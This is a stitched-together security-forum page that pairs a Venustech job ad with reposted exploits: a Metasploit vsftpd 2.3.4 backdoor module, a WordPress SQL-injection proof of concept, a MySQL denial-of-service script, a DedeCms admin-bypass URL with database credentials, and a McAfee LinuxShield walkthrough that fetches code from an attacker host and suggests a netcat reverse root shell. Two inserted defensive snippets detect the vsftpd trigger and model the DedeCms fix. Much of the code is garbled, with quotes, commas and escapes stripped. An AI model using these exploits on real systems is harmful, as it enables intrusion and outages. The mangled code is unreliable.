
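[Recruitment] [Hiring] Venustech (启明星辰) R&D hiring

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2 years or more
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ online:
  • Security assistant: Recruit or job-hunt through the 非安全中国 administrators, QQ group: 57116771


  • ++++++++++ Venustech details ++++++++++

    Just send me a message through the site.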

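    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Develop and maintain software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Expert in C programming

    2. Proficient with the Linux operating system; expert in C programming on Linux

    3. Expert in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis

    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls

    5. Familiar with the Linux kernel and kernel development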

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products

    2. Writing, executing and revising product test cases

    3. Product performance testing

    4. Support and testing for external projects

    Requirements:

    1. Basic knowledge of TCP/IP

    2. Solid data-communications fundamentals

    3. Some Linux background

    4. Able to set up and use databases

    5. Familiar with at least one programming language: C/Perl/VBS/TCL

    6. Familiar with test-case design, system testing and stress testing

    7. Familiar with firewall principles, with some understanding of firewall features

    8. Some understanding of how network security devices are deployed in a network

    9. Able to use test tools: Loadrunner, packet-analysis software, Spirent (思博伦) or IXIA testers

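    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Deliver trojan-detection services and web vulnerability scanning services

    2. Technical support for service customers

    3. Research on web-page trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows, etc.

    4. Routine upgrade and maintenance of the security event libraries for IDS/IPS/UTM/TDS/WAG/322 and other products

    5. Research on attack techniques; research on the TCP/IP protocol; research on reverse engineering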

     


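    非安全中国网 disclaimer: 1. All statements and images in this post are solely the poster's personal opinion and do not represent this site's position;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Statement" (《关于版权及免责声明》) and enjoys the associated rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Parts of this post are reposted from other media and published on this site in order to pass on more information; this does not mean the site endorses their views or vouches for their accuracy;
    5. If this post infringes your site's or your personal copyright, please notify this site immediately; the site will delete it promptly and offers its deepest apologies;
    6. The site's administrators and moderators may delete this post without prior notice to the poster.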

    VSFTPD v2.3.4 Backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require msf/core

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info
          Name => VSFTPD v2.3.4 Backdoor Command Execution
          Description => %q{
            This module exploits a malicious backdoor that was added to the VSFTPD download
            archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
            June 30th 2011 and July 1st 2011 according to the most recent information
            available. This backdoor was removed on July 3rd 2011.
          }
          Author => [ hdm mc ]
          License => MSF_LICENSE
          Version => $Revision: 13099 $
          References =>
            [
              [ URL http://pastebin.com/AetT9sS5]
              [ URL http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html ]
            ]
          Privileged => true
          Platform => [ unix ]
          Arch => ARCH_CMD
          Payload =>
            {
              Space => 2000
              BadChars =>
              DisableNops => true
              Compat =>
                {
                  PayloadType => cmd_interact
                  ConnectionType => find
                }
            }
          Targets =>
            [
              [ Automatic { } ]
            ]
          DisclosureDate => Jul 3 2011
          DefaultTarget => 0))

        register_options([ Opt::RPORT(21) ] self.class)
      end

      def exploit

        nsock = self.connect(false {RPORT => 6200}) rescue nil
        if nsock
          print_status(The port used by the backdoor bind listener is already open)
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1 30).to_s
        print_status(Banner: #{banner.strip})

        sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
        )
        resp = sock.get_once(-1 30).to_s
        print_status(USER: #{resp.strip})

        if resp =~ /^530 /
          print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error(This server did not respond as expected: #{resp.strip})
          disconnect
          return
        end

        sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
        )

        # Do not bother reading the response from password just try the backdoor
        nsock = self.connect(false {RPORT => 6200}) rescue nil
        if nsock
          print_good(Backdoor service has been spawned handling...)
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put(id
        )

        r = s.get_once(-1 5).to_s
        if r !~ /uid=/
          print_error(The service on port 6200 does not appear to be a shell)
          disconnect(s)
          return
        end

        print_good(UID: #{r.strip})

        s.put(nohup  + payload.encoded +  >/dev/null 2>&1)
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow.
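
A defender-side check built from the two indicators the module above relies on: a `USER` name containing `:)` and a listener on TCP 6200. This is an added example, not part of the original post or of Metasploit; the log line format, the listener table and all sample data are constructed assumptions.

```python
import re

# Constructed sample lines, in the style vsftpd writes when log_ftp_protocol=YES
# (line format assumed for this example; adapt USER_CMD to your own logs).
SAMPLE_LOG = """\
Mon Jul  4 09:15:02 2011 [pid 3120] FTP command: Client "198.51.100.23", "USER anonymous"
Mon Jul  4 09:15:02 2011 [pid 3120] FTP response: Client "198.51.100.23", "331 Please specify the password."
Mon Jul  4 09:17:40 2011 [pid 3188] FTP command: Client "203.0.113.7", "USER kQ2x:)"
Mon Jul  4 09:17:40 2011 [pid 3188] FTP response: Client "203.0.113.7", "331 Please specify the password."
Mon Jul  4 09:17:41 2011 [pid 3188] FTP command: Client "203.0.113.7", "PASS <password>"
Mon Jul  4 09:20:11 2011 [pid 3301] FTP command: Client "192.0.2.55", "USER smiley:)fan"
"""

# Constructed listener table in the style of `ss -ltn` output.
SAMPLE_LISTENERS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       32      0.0.0.0:21          0.0.0.0:*
LISTEN  0       100     0.0.0.0:6200        0.0.0.0:*
LISTEN  0       128     [::]:22             [::]:*
"""

BACKDOOR_PORT = 6200  # port the module connects to after sending the login
USER_CMD = re.compile(
    r'^(?P<time>.+?) \[pid (?P<pid>\d+)\] FTP command: '
    r'Client "(?P<client>[^"]+)", "USER (?P<user>.*)"$'
)


def find_trigger_logins(log_text):
    """Return every USER command whose name contains ':)'.

    The module sends the smiley at the end of a random name; matching it
    anywhere in the name is a deliberately wider net for triage.
    """
    hits = []
    for line in log_text.splitlines():
        m = USER_CMD.match(line)
        if m and ":)" in m.group("user"):
            hits.append(m.groupdict())
    return hits


def find_backdoor_listener(ss_text, port=BACKDOOR_PORT):
    """Return the local address of a LISTEN socket on `port`, or None."""
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[0] == "LISTEN":
            local = fields[3]
            if local.rsplit(":", 1)[-1] == str(port):
                return local
    return None


def triage(log_text, ss_text):
    """Combine both indicators into one verdict for the host."""
    logins = find_trigger_logins(log_text)
    listener = find_backdoor_listener(ss_text)
    if logins and listener:
        verdict = "compromise likely"
    elif logins:
        verdict = "trigger attempt seen"
    elif listener:
        verdict = "unexplained listener"
    else:
        verdict = "clean"
    return {"trigger_logins": logins, "listener": listener, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG, SAMPLE_LISTENERS)
    for hit in result["trigger_logins"]:
        print(f'{hit["time"]}  {hit["client"]}  USER {hit["user"]}')
    print("listener:", result["listener"])
    print("verdict:", result["verdict"])
```

A hit on either indicator is a reason to compare the installed vsftpd 2.3.4 source or package against a known-good copy, since the post dates the tampered archive to 30 June - 3 July 2011.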

    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 remote denial-of-service vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")

    buf2=("x11x00x00x00x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"


    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()


    Step-by-step guide to installing Linux: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 unauthorized access vulnerability

    http://www.XXXX.com/[DedeCms admin path]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA code and you get straight into the site's admin back end.

    This vulnerability only works if the admin path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);

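
Why the recursive `CheckRequest()` in the post above matters, shown as an added example (a Python model written for this page, not DedeCms code): PHP turns a parameter named `_POST[GLOBALS][cfg_dbhost]` into nested arrays, so the original loop only ever sees the top-level key `_POST`. The bracket parser is a simplified assumption of PHP's behaviour, and the query string and host name are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl

# Same pattern as the PHP check: names starting with cfg_ or GLOBALS.
BLOCKED = re.compile(r'^(cfg_|GLOBALS)')

# Constructed request, shaped like the one in the post but with placeholder values.
SAMPLE_QUERY = (
    "dopost=login&userid=admin"
    "&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
    "&_POST[GLOBALS][cfg_dbuser]=someuser"
)


def php_parse_query(query):
    """Build nested dicts from a[b][c]=v keys, roughly as PHP fills $_REQUEST.

    Simplified: empty brackets (a[]=v) are not auto-indexed as PHP would do.
    """
    out = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = re.match(r'^([^\[]+)((?:\[[^\]]*\])*)$', raw_key)
        if not m:
            out[raw_key] = value
            continue
        path = [m.group(1)] + re.findall(r'\[([^\]]*)\]', m.group(2))
        node = out
        for part in path[:-1]:
            child = node.get(part)
            if not isinstance(child, dict):
                child = {}
                node[part] = child
            node = child
        node[path[-1]] = value
    return out


def flat_check(request):
    """Model of the original loop: only top-level keys are tested."""
    return [k for k in request if k and BLOCKED.match(k)]


def recursive_check(val, path=""):
    """Model of CheckRequest(): test every key and every scalar value, at any depth."""
    hits = []
    if isinstance(val, dict):
        for k, v in val.items():
            if k and BLOCKED.match(k):
                hits.append(f"{path}[{k}] (key)")
            hits.extend(recursive_check(v, f"{path}[{k}]"))
    elif val and BLOCKED.match(str(val)):
        hits.append(f"{path} (value)")
    return hits


if __name__ == "__main__":
    request = php_parse_query(SAMPLE_QUERY)
    print("top-level keys seen by the old loop:", list(request))
    print("old check blocks:", flat_check(request) or "nothing")
    print("new check blocks:", recursive_check(request))
```

The model also shows a side effect of the fix: because scalar values are tested against the same pattern, a legitimate form value that merely begins with `cfg_` or `GLOBALS` is rejected too.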

    Step-by-step guide to installing Linux: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

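    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, conduct cache-poisoning attacks or cause a denial of service.
    1) An error in how django.contrib.sessions handles sessions when a cache backend is used can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, which validates that the supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it also tries to verify that the supplied URL exists and resolves. By default the underlying socket has no timeout, so an attacker can exploit this by sending a specially crafted URL that consumes all server memory, causing a denial of service.
    3) An error in handling redirect responses when verifying URLs supplied to the "URLField" field type lets an attacker return a redirect response to a "file://" URL, which can be used to determine whether local files exist on the server.
    4) An error in handling the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses lets an attacker conduct cache-poisoning attacks.

    References for details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/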

    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote exploit: Yes
    Local exploit: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true
              nailsd.profile.ODS_99.childInitTmo=60
              nailsd.profile.ODS_99.cleanChildren=2
              nailsd.profile.ODS_99.cleansPerChild=10000
              nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
              nailsd.profile.ODS_99.decompArchive=true
              nailsd.profile.ODS_99.decompExe=true
              nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
              nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
              nailsd.profile.ODS_99.factoryInitTmo=60
              nailsd.profile.ODS_99.heuristicAnalysis=true
              nailsd.profile.ODS_99.macroAnalysis=true
              nailsd.profile.ODS_99.maxQueSize=32
              nailsd.profile.ODS_99.mime=true
              nailsd.profile.ODS_99.noJokes=false
              nailsd.profile.ODS_99.program=true
              nailsd.profile.ODS_99.quarantineChildren=1
              nailsd.profile.ODS_99.quarantineDirectory=/quarantine
              nailsd.profile.ODS_99.quarantinesPerChild=10000
              nailsd.profile.ODS_99.scanChildren=2
              nailsd.profile.ODS_99.scanMaxTmo=301
              nailsd.profile.ODS_99.scanNWFiles=true
              nailsd.profile.ODS_99.scanOnRead=true
              nailsd.profile.ODS_99.scanOnWrite=true
              nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
              nailsd.profile.ODS_99.scansPerChild=10000
              nailsd.profile.ODS_99.slowScanChildren=0
              nailsd.profile.ODS_99.filter.0.type=exclude-path
              nailsd.profile.ODS_99.filter.0.path=/proc
              nailsd.profile.ODS_99.filter.0.subdir=true
              nailsd.profile.ODS_99.filter.extensions.mode=all
              nailsd.profile.ODS_99.filter.extensions.type=extension
              nailsd.profile.ODS_99.action.Default.primary=Clean
              nailsd.profile.ODS_99.action.Default.secondary=Quarantine
              nailsd.profile.ODS_99.action.App.primary=Clean
              nailsd.profile.ODS_99.action.App.secondary=Quarantine
              nailsd.profile.ODS_99.action.timeout=Pass
              nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory